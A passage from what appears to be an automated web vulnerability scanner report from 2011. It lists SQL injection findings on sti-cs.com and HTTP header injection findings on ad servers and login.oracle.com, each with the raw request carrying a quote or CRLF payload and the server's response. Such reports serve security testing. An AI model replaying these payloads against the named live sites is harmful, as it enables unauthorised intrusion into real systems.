Date: Sat, 26 Feb 2011 23:19:37 GMT
Content-Type: text/plain
Connection: close
Set-Cookie: referrer=; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:19 GMT
Set-Cookie: referred=rewards%7C1%27%27%3D1; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:19 GMT
Set-Cookie: redir=12722600; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:19 GMT
Location: http://www.dreamhost.com/
Content-Length: 0

1.28. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-24/page-1/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /Portfolio/Trades-and-Exhibits/id-24'/page-1/ HTTP/1.1
Host: www.sti-cs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:18:56 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 14497

...


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
<title>Trades and Exhibits :: STI - Creative Services</title>

<script type="text/javascript" language="javascript
...[SNIP]...
</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>
...[SNIP]...
1.29. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-25/page-1/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-25/page-1/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /Portfolio/Trades-and-Exhibits/id-25'/page-1/ HTTP/1.1
Host: www.sti-cs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:19:03 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 14497

...


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
<title>Trades and Exhibits :: STI - Creative Services</title>

<script type="text/javascript" language="javascript
...[SNIP]...
</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>
...[SNIP]...
1.30. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-7/page-1/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-7/page-1/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /Portfolio/Trades-and-Exhibits/id-7'/page-1/ HTTP/1.1
Host: www.sti-cs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:18:51 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 14496

...


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
<title>Trades and Exhibits :: STI - Creative Services</title>

<script type="text/javascript" language="javascript
...[SNIP]...
</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>
...[SNIP]...
2. HTTP header injection  previous  next
There are 9 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

2.1. http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B4924654.4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2998.159462.7724395940621/B4924654.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2de58%0d%0a6d24920450 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2de58%0d%0a6d24920450/N2998.159462.7724395940621/B4924654.4;sz=728x90;pc=[TPAS_ID];click=http%3A//at.atwola.com/adlink%2F5113%2F679707%2F0%2F225%2FAdId%3D1200168%3BBnId%3D3%3Bitime%3D828708808%3Bkvpg%3Dwinamp%2Fskin%2Fslick-redux%2F222084%3Bkvugc%3D0%3Bkvui%3Df2ed797a429811e090debf3ab4450fde%3Bkvmn%3D93166279%3Bkvtid%3D16lsqii1n1a3cr%3Bkr2703%3D147217%3Bkvseg%3D99999%3A53575%3A53656%3A56768%3A56830%3A56835%3A60515%3A53615%3A52766%3A60130%3A50213%3A50239%3A60190%3A50215%3Bkp%3D86178%3Bnodecode%3Dyes%3Blink%3D;ord=828708808? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.winamp.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2de58
6d24920450/N2998.159462.7724395940621/B4924654.4;sz=728x90;pc=[TPAS_ID];click=http: //at.atwola.com/adlink/5113/679707/0/225/AdId=1200168;BnId=3;itime=828708808;kvpg=winamp/skin/slick-redux/222084;kvugc=0;kvui=f2ed797a429811e090debf3ab4450fde;kvmn=93166279;kvtid=16lsqii1n1a3cr;kr2703=147217;k
Date: Sun, 27 Feb 2011 17:46:27 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
2.2. http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B5077405.10 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2998.159462.7724395940621/B5077405.10

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 62182%0d%0a5ce3b6d291b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /62182%0d%0a5ce3b6d291b/N2998.159462.7724395940621/B5077405.10;sz=728x90;pc=[TPAS_ID];click=http%3A//at.atwola.com/adlink%2F5113%2F851061%2F0%2F225%2FAdId%3D1312688%3BBnId%3D3%3Bitime%3D828694819%3Bkvpg%3Dwinamp%3Bkvugc%3D0%3Bkvui%3Df2ed797a429811e090debf3ab4450fde%3Bkvmn%3D93302596%3Bkvtid%3D16lsqii1n1a3cr%3Bkr2703%3D147217%3Bkvseg%3D99999%3A53575%3A53656%3A56768%3A56830%3A56835%3A60515%3A53615%3A52766%3A60130%3A50213%3A50239%3A60190%3A50215%3Bkp%3D86178%3Bnodecode%3Dyes%3Blink%3D;ord=828694819? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.winamp.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/62182
5ce3b6d291b/N2998.159462.7724395940621/B5077405.10;sz=728x90;pc=[TPAS_ID];click=http: //at.atwola.com/adlink/5113/851061/0/225/AdId=1312688;BnId=3;itime=828694819;kvpg=winamp;kvugc=0;kvui=f2ed797a429811e090debf3ab4450fde;kvmn=93302596;kvtid=16lsqii1n1a3cr;kr2703=147217;kvseg=99999:53575:53656
Date: Sun, 27 Feb 2011 17:46:04 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
2.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 51ad3%0d%0aeafac43fb55 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2240932&PluID=0&w=125&h=125&ord=773834383&ucm=true&ncu=$$http://at.atwola.com/adlink/5113/1838222/0/6/AdId=1468660;BnId=1;itime=773834383;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311144;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; eyeblaster=BWVal=&BWDate=&debuglevel=51ad3%0d%0aeafac43fb55; A3=heSmakIJ0c9M00001hvPTaiJy0c6L00001gIlWai180aCf00001gnhgai180cbS00001; B3=8r8g0000000001tf7.Ws0000000001tf8z130000000001th8qaI0000000001tn; u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=51ad3
eafac43fb55; expires=Fri, 27-May-2011 21: 31:25 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=heSmakII0c9M00001hvPTaiJy0c6L00001gIlWai180aCf00001gnhgai180cbS00001hK5AalZb0bfZ00001; expires=Fri, 27-May-2011 21:31:25 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8r8g0000000001tf7.Ws0000000001tf8z130000000001th8z6A0000000001tq8qaI0000000001tn; expires=Fri, 27-May-2011 21:31:25 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g; expires=Fri, 27-May-2011 21:31:25 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 27 Feb 2011 02:31:24 GMT
Connection: close
Content-Length: 2193

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
2.4. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login [Site2pstoreToken parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /pls/orasso/orasso.wwsso_app_admin.ls_login

Issue detail

The value of the Site2pstoreToken request parameter is copied into the Location response header. The payload 21d1d%0d%0adea71b54e71 was submitted in the Site2pstoreToken parameter. This caused a response containing an injected HTTP header.

Request

GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D.21d1d%0d%0adea71b54e71 HTTP/1.1
Host: login.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ORASSO_AUTH_HINT=v1.0~20110227072629; s_cc=true; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; s_nr=1298762800321; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Feb 2011 23:29:47 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Content-Length: 4725
Set-Cookie: ORASSO_AUTH_HINT=v1.0~20110227072947; Domain=.oracle.com; Path=/
Cache-Control: private
Location: https://login.oracle.com/mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D.21d1d
dea71b54e71&p_error_code=&p_submit_url=https%3A%2F%2Flogin.oracle.com%2Fsso%2Fauth&p_cancel_url=https%3A%2F%2Flogin.oracle.com&ssousername=&subscribername=
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; expires=Sun, 27-Feb-2011 07:29:47 GMT; path=/

<HTML><HEAD><TITLE>Redirect to https://login.oracle.com/mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8
...[SNIP]...
2.5. http://tacoda.at.atwola.com/rtx/r.js [N cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload bf012%0d%0af7b9b665bf was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=ADN&si=18288&pi=M&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/%2526cmmiss%253D-1%2526cmkw%253D&r=&v=5.5&cb=60711 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837; TData=99999|^|53575|53656|54063|56768|56830|56835|60506|60515|#|53615|52766|60130|50213|50239; N=2:2d4ec7443dfa469e64430537b01b46dc,ca3680f9be00bf67dd48c45e051ee302bf012%0d%0af7b9b665bf; ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTQwNjM6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MDY6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk=; eadx=1; CfP=1; JEB2=4D69B03E6E651A440C6EAF39F001EBEA

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:35:33 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 27 Feb 2011 02:50:33 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Wed, 22-Feb-12 02:35:33 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837|60190^1^1299378933; path=/; expires=Sun, 06-Mar-11 02:35:33 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1298774133^1298775933|18288^1298774133^1298775933; path=/; expires=Sun, 27-Feb-11 03:05:33 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190; expires=Wed, 22-Feb-12 02:35:33 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Sun, 27-Feb-11 08:35:33 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:ca3680f9be00bf67dd48c45e051ee302bf012
f7b9b665bf,c638727a4faa7467533adb5623113b72; expires=Wed, 22-Feb-12 02:35:33 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk6NjAxOTA=; expires=Wed, 22-Feb-12 02:35:33 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 176
Content-Type: application/x-javascript
Content-Length: 176

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqii1n1a3cr';
var ANSL='99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190';
ANRTXR();

2.6. http://tacoda.at.atwola.com/rtx/r.js [si parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 8ecf0%0d%0a6420ebe94a was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=ADN&si=8ecf0%0d%0a6420ebe94a&pi=M&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/%2526cmmiss%253D-1%2526cmkw%253D&r=&v=5.5&cb=60711 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837; TData=99999|^|53575|53656|54063|56768|56830|56835|60506|60515|#|53615|52766|60130|50213|50239; N=2:2d4ec7443dfa469e64430537b01b46dc,ca3680f9be00bf67dd48c45e051ee302; ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTQwNjM6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MDY6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk=; eadx=1; CfP=1; JEB2=4D69B03E6E651A440C6EAF39F001EBEA

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:33:28 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 27 Feb 2011 02:48:28 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Wed, 22-Feb-12 02:33:28 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837|60190^1^1299378808; path=/; expires=Sun, 06-Mar-11 02:33:28 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1298774008^1298775808|8ecf0
6420ebe94a^1298774008^1298775808; path=/; expires=Sun, 27-Feb-11 03:03:28 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190; expires=Wed, 22-Feb-12 02:33:28 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Sun, 27-Feb-11 08:33:28 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:ca3680f9be00bf67dd48c45e051ee302,c638727a4faa7467533adb5623113b72; expires=Wed, 22-Feb-12 02:33:28 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk6NjAxOTA=; expires=Wed, 22-Feb-12 02:33:28 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 176
Content-Type: application/x-javascript
Content-Length: 176

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqii1n1a3cr';
var ANSL='99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190';
ANRTXR();

2.7. http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=25/b=1225394

Issue detail

